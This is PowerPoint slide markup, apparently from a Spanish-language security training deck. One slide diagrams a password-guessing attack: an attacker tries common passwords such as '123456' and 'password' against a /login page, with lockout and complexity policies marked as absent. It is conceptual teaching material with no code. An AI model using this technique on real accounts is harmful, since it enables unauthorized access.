          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8146153A-C6A0-1316-A211-7601E842B1F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="screen">
            <a:duotone>
              <a:schemeClr val="accent6">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
            <a:alphaModFix/>
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId5">
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="5107"/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:saturation sat="79000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8829729" y="2659563"/>
            <a:ext cx="628778" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8633912E-4FDA-A061-A5F7-EC35847DF309}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7650795" y="3574760"/>
            <a:ext cx="5043415" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dojo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEA5E45B-F321-C906-4AC8-56B330438B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8241705" y="2659562"/>
            <a:ext cx="1322897" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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2BA3-307F-D840-9F44-974A71B2E195}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2193759" y="91886"/>
            <a:ext cx="9435679" cy="895136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Adivinar contraseñas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E89D8679-1F9A-2648-8F7C-86B30C5BB2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810" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4958235" y="1482863"/>
            <a:ext cx="718457" cy="872837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FB10130-A562-DD4F-BCBD-74A67D5A6E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889342" y="2355700"/>
            <a:ext cx="732893" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E058B272-AACE-CA40-ACD0-650290D3EB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0518" y="1443031"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10861651-A63F-2341-9B45-5037976551C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2198316" y="2367227"/>
            <a:ext cx="891591" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Atacante</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B399A93-1375-A142-B811-E56CD1A0137A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="475245016"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="707721" y="1482863"/>
          <a:ext cx="1302705" cy="1371600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1302705">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3099737838"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>123456</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2642470997"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="851265560"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3311727319"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ABCDEFG</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1813782707"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2527123593"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB6969D6-52B2-2D4D-9BD3-A2D9CEE20C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761850" y="2925455"/>
            <a:ext cx="1199367" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Contraseñas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Comunes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DD7B3EE-DF53-E649-A73D-7981F8164B0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="2688488"/>
            <a:ext cx="8744" cy="3610958"/>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FCD0E3E-4EA2-A044-9E70-1BADEEACE9C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5214196" y="2691207"/>
            <a:ext cx="0" cy="3551872"/>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0FBE9ED-0A51-DC44-B610-9B72D88A6109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="screen">
            <a:alphaModFix amt="41000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="181217">
            <a:off x="5899831" y="1454165"/>
            <a:ext cx="2359314" cy="2581066"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A94D0933-D312-5A45-B115-9DACCD38BF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326765" y="4024077"/>
            <a:ext cx="1199367" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Política de </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Contraseñas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B1444E6-93CC-7C4A-A11E-AB559843EDAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6778764" y="1592766"/>
            <a:ext cx="841897" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" strike="sngStrike" dirty="0"/>
              <a:t>Bloqueo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D47F43FB-6CA6-0547-AD01-C445EAFD5372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6517740" y="1951708"/>
            <a:ext cx="1180131" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" strike="sngStrike" dirty="0"/>
              <a:t>Complejidad</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1200" strike="sngStrike" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113C0ABE-3687-3840-9DE4-121F5FA9B675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2574756" y="3070532"/>
            <a:ext cx="2630695"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1D6BA40-C7AF-704D-9B1F-8219FDA4F934}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690772" y="2740789"/>
            <a:ext cx="1534394" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>intento '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" i="1" dirty="0"/>
              <a:t>123456' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B5DCAEF-9286-B34F-8AD5-A76E9CE82105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566501" y="3085069"/>
            <a:ext cx="2647695" cy="85353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8F63D0-8888-8A4E-83FB-2E07A3303CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20570414">
            <a:off x="2532856" y="3384805"/>
            <a:ext cx="1766830" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Contraseña inválida</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6017866F-70FF-4E42-8C2F-FA2A56493E9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2567504" y="3963659"/>
            <a:ext cx="2646692"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453EB07-703B-174C-A38E-CD5CB15BBC9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3566263" y="3635230"/>
            <a:ext cx="1704313" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>intento '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" i="1" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" i="1" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEFCF0BD-0245-0946-9215-D888DB9EB2BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="3994550"/>
            <a:ext cx="2639439" cy="86813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10B6A8D-7E8E-E44E-AFBA-670C4A81E98C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20563066">
            <a:off x="2532650" y="4287234"/>
            <a:ext cx="1766830" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Contraseña inválida</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B08D5C5-2014-B34C-895D-C7B07265EF5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3793578" y="4442290"/>
            <a:ext cx="343364" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F00F4E6-168E-2F48-A802-F439CB5AFAC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2583501" y="5288238"/>
            <a:ext cx="2630695"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506C3FB-36CC-7848-8DF5-AF92ED93240B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3538663" y="4987342"/>
            <a:ext cx="1806905" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>intento '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" i="1" dirty="0"/>
              <a:t>ABCDEFG' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38" name="Straight Arrow Connector 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45539125-C3EA-0940-BC5D-1594A5FC35A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="5333674"/>
            <a:ext cx="2639439" cy="768156"/>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9C91574-6A93-6C4F-86F8-8A08CEE96510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20638428">
            <a:off x="2650539" y="5563863"/>
            <a:ext cx="1556836" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0" err="1"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
